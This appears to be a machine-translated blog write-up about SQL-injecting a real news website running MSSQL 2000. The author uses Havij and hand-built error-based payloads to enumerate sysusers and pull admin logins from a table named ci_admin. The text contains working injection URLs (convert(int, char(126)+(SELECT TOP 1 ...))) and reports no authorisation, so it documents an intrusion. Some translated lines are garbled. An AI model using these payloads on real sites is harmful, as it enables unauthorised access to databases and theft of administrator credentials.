One injection of the database table owner

The day before yesterday, I found the injection of a famous website, which belongs to the Mssqlserver2000 explicit and incorrect mode. I am not talking about it, just inject it when havij starts. (PS: The HAVIJ version I used is Havij 1.14 Pro). Obtain the following information:

DB Server: MSSQL 2000 with errorCurrent User: chwebnewsSql Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86)Dec 17 2002 14:22:05Copyright (c) 1988-2003 Microsoft CorporationEnterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)Current DB: ChineseNews

All databases are exposed smoothly, and then violent tables and fields are exposed.
But the content is not exposed. havij prompts that the count cannot be obtained.

The packet is captured. Get statement

 asp?month=5&year=convert(int,(char(126)%2b">http://XXXX.com/arc.asp?month=5&year=convert(int,(char(126)%2b

(SELECT TOP 1 cast(count(*) as nvarchar(4000)) FROM ci_admin )%2bchar(126)))

 and 1=1

An error occurred while placing this statement in IE. The object Ci_admin does not exist. Naturally, the total number of records cannot be found, and violent data cannot be found.

Think twice about it. Havij cannot be panic. Ci_admin should be capitalized, and URL transcoding should be performed in the form of database +... + Table Name

(ChineseNaws... ci_admin) or chineseNaws. dbo. ci_admin still fail, and the same error message is returned. Suddenly think of the meaning of dbo in front of the table name, that is, the meaning of the database creator. Database Name + owner name + Table name, which is a complete form of table name.

The reason why the incorrect invalid object Name is reported may be that the owner Name is incorrect.

Havij cannot scan the out-of-band table. I have to manually add the sysusers table.

Add the Name field instead of scanning the field. Simply add the Name field, this is because when I use this havij to construct an injection statement, it will automatically add the primary key found during the scan. As a result, the statement structure error occurs and non-primary key data cannot be obtained, it should be a BUG of this software.
There are 17 records for scanning out sysusers

Count(*) of sysusers is 17Data Found: name=chinesewsData Found: name=chwebnewsData Found: name=db_accessadminData Found: name=db_backupoperatorData Found: name=db_datareaderData Found: name=db_datawriterData Found: name=db_ddladminData Found: name=db_denydatareaderData Found: name=db_denydatawriterData Found: name=db_ownerData Found: name=db_securityadminData Found: name=dboData Found: name=guestData Found: name=publicData Found: name=webData Found: name=webnewsData Found: name=wssnewsa

Replace the obtained usernames (users starting with db _ can be decisively excluded)

 http://XXXX.com/arc.asp?month=5&year=convert(int,(char(126)%2b(SELECT TOP 1 

cast(count(*) as nvarchar(4000)) FROM chineseNaws .

Substituted variable. ci_admin) % 2 bchar (126) and 1 = 1

When the current input is chinesews, no error occurs. Expected result 2 is displayed.

Use the following statement to obtain all data

 http://XXXX.com/arc.asp?month=5&year=convert(int,(char(126)%2b

(SELECT TOP 1 cast(login as nvarchar(4000)) FROM (SELECT TOP 2 login FROM 

ChineseNews.chinesews.ci_admin) sq order by login desc)%2bchar(126))) and 1=1

However, some tables cannot be read even if they are correctly constructed because the table does not have the select permission granted to the current database user,

This cannot be solved by constructing correct injection statements. As shown below

SQLState: 42000Native Error Code: 229[MERANT][ODBC SQL Server Driver][SQL Server]SELECT permission denied on 

object ci_login, database EMS, owner dbo.

Summary: In the sqlserver database, the database name + owner name + Table name is a complete form of table name. When a prompt indicating that the table does not exist during injection, check the table owner name in the injection Statement, which is easy to ignore.